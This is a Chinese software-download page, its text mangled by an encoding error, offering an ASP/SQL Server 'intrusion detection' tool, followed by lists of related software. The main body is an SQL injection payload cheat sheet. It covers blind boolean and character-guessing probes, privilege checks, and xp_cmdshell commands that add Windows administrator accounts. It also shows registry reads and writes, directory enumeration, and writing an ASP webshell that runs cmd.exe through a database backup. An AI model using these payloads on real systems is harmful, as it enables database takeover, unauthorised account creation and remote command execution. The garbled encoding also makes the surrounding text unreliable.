ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

È˹¤¼ì²â£¬°²ÐÄÏÂÔØ
Èí¼þͶËß
·ÖÀà
ÍøÂ簲ȫ
´óС
1MB
ÓïÑÔ
¼òÌåÖÐÎÄ
Èí¼þÊÚȨ
Ãâ·ÑÈí¼þ
ƽ̨
WinAll
¸üÐÂʱ¼ä
2022-11-07

±¾×¨Óù¤¾ß×÷ÓÃÊ®·ÖÇ¿¾¢£¬ÆÚ´ýѧÉúÃÇÓÃÒÔÕýµÀ£¬±ðÈ¥×öһЩΪ·Ç×÷´õµÄÈÃÈËÊ®·Ö¿É³ÜµÄʶù£¬ÓÉVBÓïÑÔ׫дµÄÍøÖ·Íøվ©¶´É¨ÃèרÓù¤¾ßµÄÃû×Ö£¬ASPÒýÈëÍøվ©¶´É¨ÃèרÓù¤¾ß£¬ÓÈÆäÔÚSQL ServerÒýÈë¼ìÑé²ãÃæÓзdz£¸ßµÄ׼ȷ¶È¡£

1.·Ö±æÊDz»ÊÇÓÐÒýÈë

;and 1=1

;and 1=2

2.·ÖÎöÅжÏÊDz»ÊÇmssql

;and user0

3.·Ö±æÊý¾Ý¿âϵͳÈí¼þ

;and (select count(*) from sysobjects)0 mssql

;and (select count(*) from msysobjects)0 access

4.ÒýÈëÖ÷Òª²ÎÊýÊDZêʶ·û

and [²éѯÌõ¼þ] and =

5.¼ìË÷ʱû¹ýÂÇÖ÷Òª²ÎÊýµÄ

and [²éѯÌõ¼þ] and %=

6.²ÂÊý¾Ý¿â

;and (Select Count(*) from [Êý¾Ý¿âÃû])0

7.²Â×Ö¶Î

;and (Select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0

8.²Â×Ö¶ÎÖмͼ³¤¶Ì

;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0

9.(1)²Â×ֶεÄasciiÖµ£¨access£©

;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0

(2)²Â×ֶεÄasciiÖµ£¨mssql£©

;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0

10.¼ì²â¹ÜÀíȨÏÞ¹¹Ô죨mssql£©

;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

;and 1=(SELECT IS_MEMBER(db_owner));--

11.¼ÓÉÏmssqlºÍÌåϵµÄÕ˺Å

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add

;--

;exec master.dbo.xp_cmdshell net user username

password /add;--

;exec master.dbo.xp_cmdshell net localgroup

administrators username /add;--

12.(1)½âÎöxmlÎļþĿ¼

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree c:\

;and (select top 1 paths from dirs)0

;and (select top 1 paths from dirs where paths not

in(Éϲ½»ñµÃµÄpaths)))

(2)½âÎöxmlÎļþĿ¼

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- µÃµ½µ±½ñÈ«²¿¿ØÖÆÆ÷

;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- µÃµ½¸ùĿ¼Ŀ¼

;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- µÃµ½È«²¿¸ùĿ¼µÄÎļþĿ¼Ê÷Ðνṹ

;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- ²éѯ×ÊÁϵăÈÈÝ

13.mssqlÖеÄsqlÓï¾ä

xp_regenumvalues ×¢²á±íÎļþ¸ù¼ü, ×Ó¼ü

;exec xp_regenumvalues HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion\Run ÒԺü¸¸ö¼Ç¼¼¯·½·¨»Øµ½È«²¿¼üÖµ

xp_regread ¸ù¼ü,×Ó¼ü,¼üÖµÃû

;exec xp_regread HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

CommonFilesDir »Øµ½Öƶ©¼üµÄÖµ

xp_regwrite ¸ù¼ü,×Ó¼ü, ÖµÃû, ÖµÖÖÀà, Öµ

ÖµÖÖÀàÓÐ2ÖÖREG_SZ ±íÃ÷×Ö·ûÐÍ,REG_DWORD ±íÃ÷ÕûÐÎ

;exec xp_regwrite HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName,reg_sz,hello ÔØÈë×¢²á±íÎļþ

xp_regdeletevalue ¸ù¼ü,×Ó¼ü,ÖµÃû

exec xp_regdeletevalue HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName ɾµôijһֵ

xp_regdeletekey HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey Í˸ñ¼ü,°üº¬¸Ã¼üÏÂÈ«²¿Öµ

14.mssqlµÄbackup½¨Á¢webshell

use model

create table cmd(str image);

insert into cmd(str) values (% Dim oScript %);

backup database model to disk=c:\l.asp;

15.mssqlÄÚǶº­Êý

;and (select @@version)0 µÃµ½WindowsµÄ°æ±¾ÐÅÏ¢

;and user_name()=dbo ·Ö±æµ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§ÊÇ·ñsa

;and (select user_name())0 ±¬µ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§

;and (select db_name())0 »ñµÃµ±½ñÁª½ÓµÄÊý¾Ý¿â

16.¼òÔ¼µÄwebshell

use model

create table cmd(str image);

insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);

backup database model to disk=g:\wwwtest\l.asp;

ÒªÇóµÄÇé¿öÏ£¬ÏñÕâÑù×ÓÓãº

l.asp?c=dir

Ïà¹ØרÌâ
´¥ÊÖ¹ÖÈëÇÖÉíÌåÓÎÏ·°²×¿ 36¿î

¶àÌØÊÖÓÎרÌâΪÄúÌṩ´¥ÊÖ¹ÖÈëÇÖÉíÌåÓÎÏ·°²×¿,а¶ñÓÂÕßÒ»Ðа²×¿ºº»¯¡£°²×¿Æ»¹û°æÒ»Ó¦¾ãÈ«,ÕÒ¾­µäÊÖÓξÍÀ´¶àÌØÊÖ»úÓÎϷƵµÀÏÂÔØ!

Ì°³ÔÉßд«
Ì°³ÔÉßд«
¸üÐÂÈÕÆÚ£º2022-10-18
»¶ÀÖÒ©Íè
»¶ÀÖÒ©Íè
¸üÐÂÈÕÆÚ£º2022-11-08
Á¬½ÓÓëÆÆ»µ
Á¬½ÓÓëÆÆ»µ
¸üÐÂÈÕÆÚ£º2022-11-08
×ÔÓÉ×¹Âä
×ÔÓÉ×¹Âä
¸üÐÂÈÕÆÚ£º2022-10-18
ѱÑø±öÄáÅ®º¢
ѱÑø±öÄáÅ®º¢
¸üÐÂÈÕÆÚ£º2022-11-08
¿ªÐIJ²¿´
¿ªÐIJ²¿´
¸üÐÂÈÕÆÚ£º2022-10-18
ϸ¾úÆðÔ´2
ϸ¾úÆðÔ´2
¸üÐÂÈÕÆÚ£º2022-11-08
¹«×гæÕ½
¹«×гæÕ½
¸üÐÂÈÕÆÚ£º2022-10-18
ÃλÃÖ®ÃÕ
ÃλÃÖ®ÃÕ
¸üÐÂÈÕÆÚ£º2022-11-08
Êý¾Ý¿â¹¤¾ß 41¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿â¹¤¾ß,Êý¾Ý¿â²éѯ¹¤¾ß,Êý¾Ý¿âÁ¬½Ó¹¤¾ß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

DBDiff(Êý¾Ý¿â¶Ô±È¹¤¾ß)
DBDiff(Êý¾Ý¿â¶Ô±È¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-08-19
Scuba(Êý¾Ý¿âɨÃ蹤¾ß)
Scuba(Êý¾Ý¿âɨÃ蹤¾ß)
¸üÐÂÈÕÆÚ£º2022-08-14
Dataedo(Êý¾Ý¿âÎĵµ¹¤¾ß)
Dataedo(Êý¾Ý¿âÎĵµ¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-08-10
DBSync(Êý¾Ý¿âͬ²½¹¤¾ß)
DBSync(Êý¾Ý¿âͬ²½¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-11-07
Êý¾Ý¿âͬ²½¹¤¾ß(DBSync)
Êý¾Ý¿âͬ²½¹¤¾ß(DBSync)
¸üÐÂÈÕÆÚ£º2022-11-07
ExcelToSQL²åÈëÊý¾Ý¿â¹¤¾ß
ExcelToSQL²åÈëÊý¾Ý¿â¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-11-07
MysqlCopier(Êý¾Ý¿â¸´Öƹ¤¾ß)
MysqlCopier(Êý¾Ý¿â¸´Öƹ¤¾ß)
¸üÐÂÈÕÆÚ£º2022-11-07
PDMan(Êý¾Ý¿â½¨Ä£¹¤¾ß)
PDMan(Êý¾Ý¿â½¨Ä£¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-11-07
Êý¾Ý¿â±à¼­¹¤¾ß(SqlLobEditor)
Êý¾Ý¿â±à¼­¹¤¾ß(SqlLobEditor)
¸üÐÂÈÕÆÚ£º2022-11-07
ÍøËÙ¼ì²â 40¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÍøËÙ¼ì²â,ÍøËÙ¼ì²âÔÚÏß,ÊÖ»úÍøËÙ²âÊÔÔÚÏß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

ÍøËÙ²âÊÔ
ÍøËÙ²âÊÔ
¸üÐÂÈÕÆÚ£º2023-10-11
²âÍøËÙ
²âÍøËÙ
¸üÐÂÈÕÆÚ£º2023-10-11
²âÍøËÙ
²âÍøËÙ
¸üÐÂÈÕÆÚ£º2021-09-30
ÍøËÙ¹ÜÀí
ÍøËÙ¹ÜÀí
¸üÐÂÈÕÆÚ£º2020-10-16
ÍøËÙÏÞÖÆ
ÍøËÙÏÞÖÆ
¸üÐÂÈÕÆÚ£º2020-09-02
ÍøËÙͨ
ÍøËÙͨ
¸üÐÂÈÕÆÚ£º2020-08-18
¹ýÌÚѶTPϵͳ¼ì²âÆƽâ²å¼þ
¹ýÌÚѶTPϵͳ¼ì²âÆƽâ²å¼þ
¸üÐÂÈÕÆÚ£º2021-10-19
Shadow x²âÍøËÙÈí¼þ
Shadow x²âÍøËÙÈí¼þ
¸üÐÂÈÕÆÚ£º2022-11-07
ÉÏÍøËٶȲâÊÔÈí¼þ
ÉÏÍøËٶȲâÊÔÈí¼þ
¸üÐÂÈÕÆÚ£º2013-12-17
Ö÷°å¼ì²â 41¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÖ÷°å¼ì²â,Ö÷°å¼ì²âÈí¼þ,Ö÷°å¼ì²âºÃ»µ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

ÏÔ´æ¼ì²âÈí¼þMats
ÏÔ´æ¼ì²âÈí¼þMats
¸üÐÂÈÕÆÚ£º2022-11-07
µç³Ø¼ì²âÈí¼þ(Smarter
µç³Ø¼ì²âÈí¼þ(Smarter
¸üÐÂÈÕÆÚ£º2022-11-07
³µÁ¾¼ì²âÊÕ·ÑÈí¼þ
³µÁ¾¼ì²âÊÕ·ÑÈí¼þ
¸üÐÂÈÕÆÚ£º2022-11-08
ÏÔ´æ¼ì²âÈí¼þMats
ÏÔ´æ¼ì²âÈí¼þMats
¸üÐÂÈÕÆÚ£º2022-11-08
»ªË¶Ö÷°å¿ØÖÆrgb·çÉÈÈí¼þ
»ªË¶Ö÷°å¿ØÖÆrgb·çÉÈÈí¼þ
¸üÐÂÈÕÆÚ£º2022-11-07
»ªÇæÖ÷°åµÆ¹â¿ØÖÆÈí¼þ
»ªÇæÖ÷°åµÆ¹â¿ØÖÆÈí¼þ
¸üÐÂÈÕÆÚ£º2022-11-07
¹ýÌÚѶTPϵͳ¼ì²âÆƽâ²å¼þ
¹ýÌÚѶTPϵͳ¼ì²âÆƽâ²å¼þ
¸üÐÂÈÕÆÚ£º2021-10-19
Êý¾Ý¿âÈí¼þ 41¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿âÈí¼þ,Ãâ·ÑÊý¾Ý¿âÈí¼þ,Êý¾Ý¿âÈí¼þÅÅÐÐ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

ÊÖ»ú¶¨Î»Èí¼þ°²×¿°æ
ÊÖ»ú¶¨Î»Èí¼þ°²×¿°æ
¸üÐÂÈÕÆÚ£º2023-06-19
Excel°²×¿°²×¿°æ
Excel°²×¿°²×¿°æ
¸üÐÂÈÕÆÚ£º2022-11-07
°²×¿»ÊµÛ°²×¿°æ
°²×¿»ÊµÛ°²×¿°æ
¸üÐÂÈÕÆÚ£º2022-11-08
°²×¿»ùÕ¾Ëø¶¨Èí¼þ
°²×¿»ùÕ¾Ëø¶¨Èí¼þ
¸üÐÂÈÕÆÚ£º2022-11-07
°²×¿ÊÖ»ú×ÖÌåÈí¼þ
°²×¿ÊÖ»ú×ÖÌåÈí¼þ
¸üÐÂÈÕÆÚ£º2022-11-07
°²×¿ÊÖ»ú±¸·ÝÈí¼þ
°²×¿ÊÖ»ú±¸·ÝÈí¼þ
¸üÐÂÈÕÆÚ£º2022-11-07
Èí¼þÌìÌð²×¿°æ
Èí¼þÌìÌð²×¿°æ
¸üÐÂÈÕÆÚ£º2022-11-07
EGOÈí¼þ°²×¿°æ
EGOÈí¼þ°²×¿°æ
¸üÐÂÈÕÆÚ£º2022-11-07
ÍøÓÑÆÀÂÛ
ÓÑÇéÁ´½Ó
ÎÂÜ°Ìáʾ
ÄúºÃ:
¸ÐлÄúÏÂÔر¾Èí¼þ¡£
ÏÖÑûÇëÄú¹Ø×¢ÎÒÃǵÄ΢ÐŹ«Öںš£
Äú½«»ñÈ¡µ½´ËÈí¼þµÄ°²×°Ê¹Óý̳̼°Èí¼þµÄÏà¹Ø¿Î³Ìѧϰ¡£
ÈçÓÐÒÉÎÊÒ²¿ÉÔÚ΢ÐŹ«ÖÚºÅÖлظ´ÎÊÌ⣬½«»áÓÐÈ˹¤¿Í·þΪÄú½â´ð¡£
ºÃµÄ£¬ÎÒÖªµÀÁË